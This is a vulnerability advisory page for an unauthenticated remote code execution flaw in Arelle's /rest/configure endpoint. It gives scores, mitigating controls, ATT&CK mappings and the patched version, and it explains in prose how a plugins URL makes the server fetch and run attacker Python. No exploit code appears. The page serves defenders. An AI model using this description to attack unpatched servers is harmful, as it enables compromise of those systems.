Cyber Posture

CVE-2026-42796

CriticalPublic PoC

Published: 04 May 2026

Published
04 May 2026
Modified
05 May 2026
KEV Added
Patch
CVSS Score 9.8 CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
EPSS Score 0.0028 51.1th percentile
Risk Priority 20 60% EPSS · 20% KEV · 20% CVSS

Description

Arelle before 2.39.10 contains an unauthenticated remote code execution vulnerability in the /rest/configure REST endpoint that accepts a plugins query parameter and forwards it to the plugin manager without authentication or authorization. Attackers can supply a URL to a malicious…

more

Python file through the plugins parameter, causing the Arelle webserver to download and execute the attacker-controlled code within the Arelle process with its privileges.

Mitigating Controls (NIST 800-53 r5)AI

AC-14 Permitted Actions Without Identification or Authentication good match
prevent

Directly mitigates the vulnerability by prohibiting unauthenticated access to critical functions like the /rest/configure endpoint's plugins parameter that enables remote code execution.

SC-14 Public Access Protections good match
prevent

Enforces security requirements on publicly accessible web endpoints such as /rest/configure to prevent unauthorized remote code execution via unauthenticated requests.

AC-3 Access Enforcement good match
prevent

Enforces approved authorizations to block unauthenticated access to the plugin manager through the vulnerable REST endpoint.

Security SummaryAI

CVE-2026-42796 is an unauthenticated remote code execution vulnerability affecting Arelle versions prior to 2.39.10. The issue resides in the /rest/configure REST endpoint, which accepts a plugins query parameter and passes it directly to the plugin manager without any authentication or authorization checks. By supplying a URL pointing to a malicious Python file via this parameter, an attacker can cause the Arelle webserver to download and execute the attacker-controlled code within the Arelle process, running with its existing privileges. The vulnerability is rated with a CVSS v3.1 base score of 9.8 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) and is associated with CWE-306 (Missing Authentication for Critical Function).

Any unauthenticated remote attacker with network access to the Arelle webserver can exploit this vulnerability by crafting an HTTP request to the /rest/configure endpoint with a malicious plugins parameter. Successful exploitation leads to arbitrary code execution on the server, potentially allowing full compromise of the Arelle process, including high confidentiality, integrity, and availability impacts as reflected in the CVSS vector.

Mitigation is available through upgrading to Arelle version 2.39.10 or later, as detailed in the project's release notes. The fixing pull request (#2320) on the Arelle GitHub repository addresses the lack of authentication by implementing proper checks in the plugin manager. Additional details on the vulnerability and exploitation are provided in the Vulncheck advisory.

Details

CWE(s)
CWE-306

MITRE ATT&CK Enterprise TechniquesAI

T1190 Exploit Public-Facing Application Initial Access
Adversaries may attempt to exploit a weakness in an Internet-facing host or system to initially access a network.
attack.mitre.org →
T1059.006 Python Execution
Adversaries may abuse Python commands and scripts for execution.
attack.mitre.org →
T1105 Ingress Tool Transfer Command And Control
Adversaries may transfer tools or other files from an external system into a compromised environment.
attack.mitre.org →
Why these techniques?

Unauthenticated RCE in public /rest/configure endpoint enables T1190 (Exploit Public-Facing Application). Attacker-supplied URL causes server-side download (T1105 Ingress Tool Transfer) followed by Python execution (T1059.006) with process privileges.

Confidence: HIGH · MITRE ATT&CK Enterprise v18.1

References